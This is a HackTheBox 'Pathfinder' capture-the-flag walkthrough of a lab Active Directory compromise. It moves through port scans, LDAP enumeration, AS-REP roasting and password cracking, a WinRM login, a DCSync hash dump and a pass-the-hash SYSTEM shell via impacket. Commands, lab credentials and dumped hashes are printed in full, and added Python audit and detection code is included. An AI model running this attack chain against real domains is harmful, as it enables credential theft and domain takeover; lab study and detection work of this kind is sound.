HackTheBox: Pathfinder

Port scanning

Run masscan first, then nmap, to scan the target's ports.

┌──(bob㉿woo)-[~/Tools/AntSword-Loader-v4.0.3-linux-x64]
└─$ sudo masscan -p 1-65535 10.10.10.30 -e tun0 --rate=1000
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-07-17 08:09:16 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 47001/tcp on 10.10.10.30                                  
Discovered open port 49664/tcp on 10.10.10.30                                  
Discovered open port 9389/tcp on 10.10.10.30                                   
Discovered open port 49667/tcp on 10.10.10.30                                  
Discovered open port 49671/tcp on 10.10.10.30                                  
Discovered open port 49718/tcp on 10.10.10.30                                  
Discovered open port 49666/tcp on 10.10.10.30                                  
Discovered open port 49677/tcp on 10.10.10.30                                  
Discovered open port 49683/tcp on 10.10.10.30                                  
Discovered open port 135/tcp on 10.10.10.30                                    
Discovered open port 3268/tcp on 10.10.10.30                                   
Discovered open port 88/tcp on 10.10.10.30                                     
Discovered open port 3269/tcp on 10.10.10.30                                   
Discovered open port 53/tcp on 10.10.10.30                                     
Discovered open port 49665/tcp on 10.10.10.30                                  
Discovered open port 5985/tcp on 10.10.10.30                                   
Discovered open port 139/tcp on 10.10.10.30                                    
Discovered open port 445/tcp on 10.10.10.30                                    
Discovered open port 49676/tcp on 10.10.10.30                                  
Discovered open port 636/tcp on 10.10.10.30                                    
Discovered open port 593/tcp on 10.10.10.30                                    
Discovered open port 389/tcp on 10.10.10.30                                    
Discovered open port 49698/tcp on 10.10.10.30                                  
Discovered open port 464/tcp on 10.10.10.30 
┌──(bob㉿woo)-[~/Tools/AntSword-Loader-v4.0.3-linux-x64]
└─$ nmap -sC -sV 10.10.10.30
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-17 16:12 CST
Stats: 0:00:11 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 67.60% done; ETC: 16:13 (0:00:05 remaining)
Stats: 0:00:20 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 93.35% done; ETC: 16:13 (0:00:01 remaining)
Stats: 0:00:35 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 27.27% done; ETC: 16:13 (0:00:16 remaining)
Stats: 0:00:50 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 81.82% done; ETC: 16:13 (0:00:05 remaining)
Nmap scan report for 10.10.10.30
Host is up (0.28s latency).
Not shown: 989 closed ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-07-17 15:20:57Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: PATHFINDER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h07m30s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-07-17T15:21:14
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.82 seconds

The target exposes a large number of ports, but the important ones are ldap, kpasswd5 and kerberos-sec; together they identify the target as an Active Directory domain controller.
Nmap's result for the LDAP ports also reveals the domain: Domain: MEGACORP.LOCAL0.

Gathering information over LDAP

First, a word on the tool used here, LDAPDomainDump: it is an Active Directory information-gathering tool that works over LDAP. In an Active Directory domain, any authenticated user can retrieve a large amount of valuable information via LDAP.
So the tool needs an authenticated user. Because the Starting Point machines are linked to one another, the username and password obtained on the previous target, sandra / Password1234!, can be reused here:

┌──(bob㉿woo)-[~/Tools/AntSword-Loader-v4.0.3-linux-x64]
└─$ ldapdomaindump -u MEGACORP\\sandra -p Password1234! -o ldapinfo 10.10.10.30 --no-json --no-grep
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

The output is in HTML format; domain_users.html is shown below. There are five accounts: Guest, Administrator and krbtgt are default accounts, while sandra and svc_bes were created by users. Note that the svc_bes account has the DONT_REQ_PREAUTH flag set.
This touches on how Kerberos authentication works, so here is a brief overview to make it easier to follow.
The figure above shows the Kerberos authentication flow. If a user's flag is DONT_REQ_PREAUTH, steps 2 and 3 (pre-authentication) are skipped, which means a ticket can be requested for that user directly, without knowing the password; the encrypted part of the KDC's reply can then be cracked offline.
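The flag discussed above is one bit of the userAccountControl attribute that LDAP returns for each account. As an added example (not part of the original post), the following Python audit decodes that bitmask and lists the enabled accounts that have pre-authentication disabled, i.e. the ones exposed to the AS-REP request shown in the next section. The records are constructed to mirror the five accounts above plus one hypothetical disabled account (old_svc); the bit values are the documented userAccountControl flags.

```python
"""Audit userAccountControl values for accounts with Kerberos pre-auth disabled.

Added example, not from the original write-up. Sample records are constructed.
"""

# Documented userAccountControl bits (subset relevant to this audit).
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x400000: "DONT_REQ_PREAUTH",
}


def decode_uac(value: int) -> list:
    """Return the names of all known flags set in a userAccountControl value."""
    return [name for bit, name in UAC_FLAGS.items() if value & bit]


def preauth_disabled_accounts(records) -> list:
    """Return (sAMAccountName, flags) for enabled accounts without pre-auth.

    Disabled accounts are skipped: the KDC rejects AS-REQs for them, so they
    cannot be roasted until someone re-enables them (they still deserve a fix).
    """
    exposed = []
    for rec in records:
        flags = decode_uac(rec["userAccountControl"])
        if "DONT_REQ_PREAUTH" in flags and "ACCOUNTDISABLE" not in flags:
            exposed.append((rec["sAMAccountName"], flags))
    return exposed


# Constructed sample records; default-account values match AD's defaults.
SAMPLE_USERS = [
    {"sAMAccountName": "Administrator", "userAccountControl": 0x200 | 0x10000},
    {"sAMAccountName": "Guest", "userAccountControl": 0x200 | 0x2 | 0x20 | 0x10000},
    {"sAMAccountName": "krbtgt", "userAccountControl": 0x200 | 0x2},
    {"sAMAccountName": "sandra", "userAccountControl": 0x200},
    {"sAMAccountName": "svc_bes", "userAccountControl": 0x200 | 0x400000},
    # Hypothetical disabled account that also lacks pre-auth: not reported.
    {"sAMAccountName": "old_svc", "userAccountControl": 0x200 | 0x2 | 0x400000},
]

if __name__ == "__main__":
    for name, flags in preauth_disabled_accounts(SAMPLE_USERS):
        print(f"{name}: {', '.join(flags)}")
```

The fix for any account it reports is to clear the flag (Account Options, "Do not require Kerberos preauthentication") and rotate the password, since an attacker who already captured an AS-REP can keep cracking it offline.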

Requesting the ticket and cracking the password

Now use GetNPUsers.py from the impacket toolkit to request the ticket. If impacket is not installed, run the following commands to install it:

sudo -s
cd /opt && git clone https://github.com/SecureAuthCorp/impacket.git && cd impacket
sudo python3 -m pip install .
sudo python3 setup.py install
cd examples/

Use GetNPUsers to request svc_bes's ticket and output it in a format john can consume.
The options used have the following meanings:

-request   : Requests TGT for users and output them in JtR/hashcat format (default False)
-no-pass   : Don't ask for password (useful for Kerberos authentication)
-dc-ip     : IP Address of the domain controller.
-format    : Format to save the AS_REQ of users without pre-authentication. Default is hashcat

john's cracking result is shown below; it yields svc_bes's password: Sheffield19

┌──(bob㉿woo)-[~/ldapinfo]
└─$ john hash --wordlist=/usr/share/wordlists/rockyou.txt                    
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:04 16.51% (ETA: 17:07:35) 0g/s 645043p/s 645043c/s 645043C/s yogismom..yoellia14
Sheffield19      ($krb5asrep$svc_bes@MEGACORP.LOCAL)
1g 0:00:00:15 DONE (2021-07-17 17:07) 0.06459g/s 684981p/s 684981c/s 684981C/s Sherbear94..Shawne116
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Remote login via WinRM

Now we have svc_bes's password, and since port 5985 (WinRM, Windows Remote Management) is open on the target, evil-winrm can be used to manage it remotely; if it is not installed, install it with: gem install evil-winrm. Once logged in, the user-level flag can be read.

┌──(bob㉿woo)-[~/ldapinfo]
└─$ evil-winrm -u svc_bes -p Sheffield19 -i 10.10.10.30             

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_bes> cd Desktop
*Evil-WinRM* PS C:\Users\svc_bes\Desktop> type user.txt
b05fb166688a8603d970c6d033f637f1

Privilege escalation

Drag the four JSON files collected with bloodhound-python into BloodHound and start analysing. Many analyses are available, but the most useful ones are Shortest Paths to High Value Targets and Find Principals with DCSync Rights. The result of Find Principals with DCSync Rights shows that svc_bes has the GetChangesAll right over the domain controller, which means this account can request replication of data from the domain controller and obtain sensitive information such as user hashes. Reference: (https://blog.csdn.net/qianxiaoyiran311/article/details/106027299)
Use secretsdump.py from the impacket toolkit to perform the DCSync attack and dump the NTLM hashes of all domain users. An NTLM credential is made up of the domain name, the user name and the hashed form of the password entered when the user first logged on.

┌──(bob㉿woo)-[~/Zones]
└─$ secretsdump.py MEGACORP.LOCAL/svc_bes:Sheffield19@10.10.10.30
Impacket v0.9.24.dev1+20210625.150349.2eff99fc - Copyright 2021 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f9f700dbf7b492969aac5943dab22ff3:::
svc_bes:1104:aad3b435b51404eeaad3b435b51404ee:0d1ce37b8c9e5cf4dbd20f5b88d5baca:::
sandra:1105:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
PATHFINDER$:1000:aad3b435b51404eeaad3b435b51404ee:70f577ff8a6a3fdc985b9933b0964beb:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:056bbaf3be0f9a291fe9d18d1e3fa9e6e4aff65ef2785c3fdc4f6472534d614f
Administrator:aes128-cts-hmac-sha1-96:5235da455da08703cc108293d2b3fa1b
Administrator:des-cbc-md5:f1c89e75a42cd0fb
krbtgt:aes256-cts-hmac-sha1-96:d6560366b08e11fa4a342ccd3fea07e69d852f927537430945d9a0ef78f7dd5d
krbtgt:aes128-cts-hmac-sha1-96:02abd84373491e3d4655e7210beb65ce
krbtgt:des-cbc-md5:d0f8d0c86ee9d997
svc_bes:aes256-cts-hmac-sha1-96:2712a119403ab640d89f5d0ee6ecafb449c21bc290ad7d46a0756d1009849238
svc_bes:aes128-cts-hmac-sha1-96:7d671ab13aa8f3dbd9f4d8e652928ca0
svc_bes:des-cbc-md5:1cc16e37ef8940b5
sandra:aes256-cts-hmac-sha1-96:2ddacc98eedadf24c2839fa3bac97432072cfac0fc432cfba9980408c929d810
sandra:aes128-cts-hmac-sha1-96:c399018a1369958d0f5b242e5eb72e44
sandra:des-cbc-md5:23988f7a9d679d37
PATHFINDER$:aes256-cts-hmac-sha1-96:63f54baad343b721e1fafb11f02df20e6ad06292cab9db214338f5bc02de094a
PATHFINDER$:aes128-cts-hmac-sha1-96:03e78b35c1feb2be71b7953087333648
PATHFINDER$:des-cbc-md5:61b091839ee9e35d
[*] Cleaning up... 
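On the defending side, the replication right that BloodHound surfaced is exactly what the DRSUAPI method above exercises, and a domain controller audits each such request as Security event 4662 whose Properties field lists the control-access GUIDs used. As an added example (not from the original post), this Python rule flags 4662 events where a non-machine account exercises a replication right; the events are constructed, the GUIDs are the documented extended-right values, and the allowlist entry msol_sync is a hypothetical sync account.

```python
"""Flag DCSync-style replication requests in Windows Security event 4662.

Added example, not from the original write-up. Sample events are constructed.
"""

# Documented extended-right GUIDs that together permit directory replication.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Accounts expected to replicate (assumption; tune per environment).
ALLOWED_REPLICATORS = {"msol_sync"}  # hypothetical directory-sync account


def is_machine_account(name: str) -> bool:
    """Domain controllers replicate under their machine account (trailing $)."""
    return name.endswith("$")


def dcsync_alerts(events) -> list:
    """Return (user, right) for 4662 events where a non-DC account replicates."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        user = ev["SubjectUserName"]
        if is_machine_account(user) or user.lower() in ALLOWED_REPLICATORS:
            continue
        props = ev.get("Properties", "").lower()
        for guid, right in REPLICATION_RIGHTS.items():
            if guid in props:
                alerts.append((user, right))
    return alerts


# Constructed sample events; field names follow the 4662 schema.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "PATHFINDER$", "SubjectDomainName": "MEGACORP",
     "ObjectType": "domainDNS", "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "svc_bes", "SubjectDomainName": "MEGACORP",
     "ObjectType": "domainDNS",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # Unrelated property access by a normal user (placeholder GUID, constructed).
    {"EventID": 4662, "SubjectUserName": "sandra", "SubjectDomainName": "MEGACORP",
     "ObjectType": "user", "Properties": "{00000000-0000-0000-0000-000000000000}"},
    {"EventID": 4624, "SubjectUserName": "svc_bes", "SubjectDomainName": "MEGACORP"},
]

if __name__ == "__main__":
    for user, right in dcsync_alerts(SAMPLE_EVENTS):
        print(f"ALERT: {user} exercised {right}")
```

Event 4662 is only produced when the Directory Service Access audit subcategory is enabled and the domain object's SACL audits control access, so both must be in place before this rule sees anything. The durable fix is to remove the replication rights from accounts like svc_bes that have no business holding them.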

With the Administrator user's hash obtained via secretsdump, a pass-the-hash (PTH) attack can be performed to gain system access. Here psexec.py from the impacket toolkit is used.

┌──(bob㉿woo)-[~/Zones]
└─$ psexec.py MEGACORP.LOCAL/Administrator@10.10.10.30 -hashes aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18                     
Impacket v0.9.24.dev1+20210625.150349.2eff99fc - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on 10.10.10.30.....
[*] Found writable share ADMIN$
[*] Uploading file yFPortAS.exe
[*] Opening SVCManager on 10.10.10.30.....
[*] Creating service fReT on 10.10.10.30.....
[*] Starting service fReT.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system
C:\Users\Administrator\Desktop>type root.txt
ee613b2d048303e5fd4ac6647d944645

Notes

References:
https://shapmanasick.gitbook.io/starting-point-htb/pathfinder-walkthrough
https://blog.csdn.net/qianxiaoyiran311/article/details/106027299
